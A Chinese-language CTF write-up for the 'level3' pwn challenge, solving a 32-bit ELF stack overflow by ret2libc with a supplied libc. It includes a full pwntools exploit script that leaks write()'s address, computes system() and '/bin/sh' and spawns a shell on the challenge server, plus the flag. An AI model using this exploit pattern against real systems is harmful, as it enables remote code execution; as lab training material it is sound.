CTF – XMan – level3 - ELF

题目说明

题目来源: XMan

题目: level3

read() 栈溢出 ROP 有libc ret2libc 重复调用

本篇说明

由于我在做题的时候先做的攻防世界再做的Jarvisoj平台,而攻防世界的level3是没有给出libc文件的,所以先有的ret2libc无libc利用文章。这篇是Jarvisoj平台的level3,给出了libc文件,这篇文章为ret2libc有libc利用,而两个平台的level3结构几乎一致,有无libc的不同只在于对libc中地址的获取手法不同,所以不对如伪代码、利用思路、Paylaod等重复细节进行描述

解题步骤

解压文件后有两个文件level3和libc-2.19.so
level3和libc-2.19.so都是32位elf文件

检查安全机制,level3开了NX栈不可执行,不考虑shellcode
libc-2.19.so开了NX栈不可执行,PIE地址随机,Stack溢出保护

整体结构几乎与上一篇一样,这里不亮出伪代码,只描述有libc情况的操作

既然给出了libc文件,那么久不需要LibcSearcher进行libc文件版本定位,直接使用ELF加载ilbc文件进行查找就好了

无libc的利用步骤如下:

1.通过vulerable_function()的read()构造ROP得到PLT表中write()的位置
2.通过write()得到write()在程序中的真实地址
3.使用LibcSearcher得到libc版本
4.在对应的libc版本中查找write()、system()、/bin/sh的真实地址
5.使用write()的程序地址和libc地址计算出偏移量
6.在system()、/bin/sh的真实地址上加上偏移量再通过vulerable_function()执行得到shell

有libc的情况下,就不需要第三步了,直接在第四步使用ELF()载入libc文件进行symbols查找,其他步骤和无libc一样

写出exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *

p = remote('pwn2.jarvisoj.com','9879')
elf = ELF('./level3')
libc = ELF('./libc-2.19.so')

#获取write()在程序内GOT地址和vulnerable_function()调用地址
write_plt = elf.plt['write']
write_got = elf.got['write']
valf_addr = elf.symbols['vulnerable_function']

#获取write()在程序内真实地址
p.recv()
payload1 = 'A'*0x88 + 'A'*0x4 + p32(write_plt) + p32(valf_addr) + p32(0x1) + p32(write_got) + p32(0x4)
p.send(payload1)

write_addr = u32(p.recv(4))
print("write addr - "+hex(write_addr))

#载入libc并得到/bin/sh、write()、system()、exit()在libc中地址
write_libc = libc.symbols['write']
system_libc = libc.symbols['system']
bin_sh_libc = libc.search('/bin/sh').next()
exit_libc = libc.symbols['exit']

#计算偏移量
libc_base = write_addr - write_libc

#得到system()、/bin/sh、exit()在内存中的真实地址
system_addr = libc_base + system_libc
bin_sh_addr = libc_base + bin_sh_libc
exit_addr = libc_base + exit_libc
print("system addr - "+hex(system_addr))
print("bin_sh addr - "+hex(bin_sh_addr))
print("exit addr - "+hex(exit_addr))

sleep(2)

p.recv()
payload2 = 'A'*0x88 + 'A'*0x4 + p32(system_addr) + p32(exit_addr) + p32(bin_sh_addr)
p.send(payload2)

p.interactive()

运行得到flag

flag:

1
CTF{d85346df5770f56f69025bc3f5f1d3d0}